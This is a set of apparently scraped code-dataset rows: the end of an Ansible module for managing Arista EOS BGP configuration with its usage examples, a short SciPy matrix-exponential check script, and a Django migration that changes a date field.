# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vlan": 5,
# "vrfs": [
# {
# "neighbor": [
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "maximum_received_routes": {
# "count": 12000
# },
# "peer": "192.168.3.11"
# }
# ],
# "route_target": {
# "action": "import",
# "target": "54:11"
# },
# "vrf": "vrf01"
# }
# ]
# },
# "changed": true,
# "commands": [
# "router bgp 100",
# "vrf vrf01",
# "no route-target import 54:11",
# "neighbor 10.1.3.2 allowas-in",
# "neighbor 10.1.3.2 default-originate always",
# "neighbor 10.1.3.2 dont-capability-negotiate",
# "neighbor 10.1.3.2 export-localpref 4000",
# "neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent",
# "neighbor 10.1.3.2 next-hop-unchanged",
# "neighbor 10.1.3.2 prefix-list prefix01 out",
# "neighbor peer1 fall-over bfd",
# "neighbor peer1 link-bandwidth update-delay 5",
# "neighbor peer1 monitoring",
# "neighbor peer1 send-community extended link-bandwidth aggregate 600",
# "no neighbor 192.168.3.11",
# "redistribute static route-map map_static",
# "redistribute attached-host",
# "aggregate-address 1.2.1.0/24 as-set match-map match01",
# "aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only",
# "maximum-paths 55",
# "distance bgp 50",
# "exit",
# "no neighbor peer1 peer-group",
# "no neighbor peer1 link-bandwidth update-delay 5",
# "no neighbor peer1 fall-over bfd",
# "no neighbor peer1 monitoring",
# "no neighbor peer1 send-community extended link-bandwidth aggregate 600",
# "no neighbor peer1 maximum-routes 12000",
# "no neighbor 10.1.3.2",
# "no redistribute static route-map map_static",
# "no redistribute attached-host",
# "no aggregate-address 1.2.1.0/24 as-set match-map match01",
# "no aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only",
# "bgp host-routes fib direct-install",
# "bgp log-neighbor-changes",
# "no distance bgp 50 50 50",
# "no maximum-paths 55",
# "no vlan 5"
# ],
#
# Using replaced (in presence of address_family under vrf):
# Before State:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# bgp additional-paths send any
# !
# vrf vrf01
# distance bgp 50 50 50
# maximum-paths 55
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# !
# address-family ipv6
# redistribute dhcp
# veos(config)#
- name: Replace
arista.eos.eos_bgp_global:
config:
as_number: "100"
graceful_restart:
set: True
router_id: "1.1.1.1"
timers:
keepalive: 2
holdtime: 5
ucmp:
mode:
set: True
vlan_aware_bundle: "bundle1 bundle2 bundle3"
state: replaced
# Module Execution:
# fatal: [192.168.122.113]: FAILED! => {
# "changed": false,
# "invocation": {
# "module_args": {
# "config": {
# "access_group": null,
# "aggregate_address": null,
# "as_number": "100",
# "bgp_params": null,
# "default_metric": null,
# "distance": null,
# "graceful_restart": {
# "restart_time": null,
# "set": true,
# "stalepath_time": null
# },
# "graceful_restart_helper": null,
# "maximum_paths": null,
# "monitoring": null,
# "neighbor": null,
# "network": null,
# "redistribute": null,
# "route_target": null,
# "router_id": "1.1.1.1",
# "shutdown": null,
# "timers": {
# "holdtime": 5,
# "keepalive": 2
# },
# "ucmp": {
# "fec": null,
# "link_bandwidth": null,
# "mode": {
# "nexthops": null,
# "set": true
# }
# },
# "update": null,
# "vlan": null,
# "vlan_aware_bundle": "bundle1 bundle2 bundle3",
# "vrfs": null
# },
# "running_config": null,
# "state": "replaced"
# }
# },
# "msg": "Use the _bgp_af module to delete the address_family under vrf, before replacing/deleting the vrf."
# }
# Using deleted:
# Before state:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# bgp additional-paths send any
# !
# vrf vrf01
# distance bgp 50 50 50
# maximum-paths 55
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
- name: Delete configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
state: deleted
# After State:
# veos(config)#show running-config | section bgp
# router bgp 100
#
#
# Module Execution:
#
# "after": {
# "as_number": "100"
# },
# "before": {
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "vrfs": [
# {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vrf": "vrf01"
# }
# ]
# },
# "changed": true,
# "commands": [
# "router bgp 100",
# "no vrf vrf01",
# "no bgp convergence slow-peer time 6",
# "no bgp additional-paths send any"
# ],
#
# Using purged:
# Before state:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# distance bgp 50 50 50
# maximum-paths 55
# bgp additional-paths send any
# neighbor peer1 peer-group
# neighbor peer1 link-bandwidth update-delay 5
# neighbor peer1 fall-over bfd
# neighbor peer1 monitoring
# neighbor peer1 send-community extended link-bandwidth aggregate 600
# neighbor peer1 maximum-routes 12000
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# vlan 5
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# !
# vrf vrf01
# route-target import 54:11
# neighbor 192.168.3.11 dont-capability-negotiate
# neighbor 192.168.3.11 allowas-in 3
# neighbor 192.168.3.11 default-originate always
# neighbor 192.168.3.11 maximum-routes 12000
# veos(config)#
- name: Purge configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
state: purged
# After State:
# veos(config)#show running-config | section bgp
# veos(config)#
# Module Execution:
# "after": {},
# "before": {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "fall_over": true,
# "link_bandwidth": {
# "set": true,
# "update_delay": 5
# },
# "maximum_received_routes": {
# "count": 12000
# },
# "monitoring": true,
# "peer": "peer1",
# "peer_group": "peer1",
# "send_community": {
# "community_attribute": "extended",
# "link_bandwidth_attribute": "aggregate",
# "speed": "600",
# "sub_attribute": "link-bandwidth"
# }
# },
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vlan": 5,
# "vrfs": [
# {
# "neighbor": [
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "maximum_received_routes": {
# "count": 12000
# },
# "peer": "192.168.3.11"
# }
# ],
# "route_target": {
# "action": "import",
# "target": "54:11"
# },
# "vrf": "vrf01"
# }
# ]
# },
# "changed": true,
# "commands": [
# "no router bgp 100"
# ],
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.arista.eos.plugins.module_utils.network.eos.argspec.bgp_global.bgp_global import (
Bgp_globalArgs,
)
from ansible_collections.arista.eos.plugins.module_utils.network.eos.config.bgp_global.bgp_global import (
Bgp_global,
)
def main():
    """Entry point when the module file is executed by Ansible.

    Builds the AnsibleModule from the generated Bgp_global argument spec,
    delegates all config/state handling to the Bgp_global resource class,
    and reports the outcome back to the controller.

    :returns: never returns normally; ``exit_json`` terminates the process
        with the result from module invocation
    """
    ansible_module = AnsibleModule(
        supports_check_mode=False,
        argument_spec=Bgp_globalArgs.argument_spec,
        required_if=[],
        mutually_exclusive=[],
    )
    resource = Bgp_global(ansible_module)
    ansible_module.exit_json(**resource.execute_module())


if __name__ == "__main__":
    main()
| StarcoderdataPython |
3200611 |
# Quick sanity check: compare the hand-rolled matrix exponential `expmat`
# from the local `rohf` module against SciPy's reference implementation.
from rohf import expmat
# NOTE: import from the public scipy.linalg namespace; the private
# scipy.linalg.matfuncs path was removed in modern SciPy releases.
from scipy.linalg import expm
from numpy import zeros, identity, array

n = 2
I = identity(n, 'd')
# Other test matrices tried previously (kept for reference):
# A = zeros((n, n), 'd')
# A = I / 3.
# A = array([[-49, 24], [-64, 31]], 'd')  # Moler/Van Loan example, doesn't work
# A = array([[0, 0.5], [0.5, 0]], 'd')
A = array([[1, 0.5], [0.5, 1]], 'd')

# Python 3 print() calls (original used Python 2 print statements).
print(A)
E = expmat(A, nmax=20)  # series expansion truncated after nmax terms
print(E)
print(expm(A))  # reference value from SciPy for comparison
| StarcoderdataPython |
3302456 | # Generated by Django 3.1 on 2020-08-29 02:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lesson_planner', '0034_auto_20200828_1857'),
]
operations = [
migrations.RemoveField(
model_name='series',
name='start_date',
),
migrations.AddField(
model_name='series',
name='start_datetime',
field=models.DateTimeField(null=True),
),
]
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.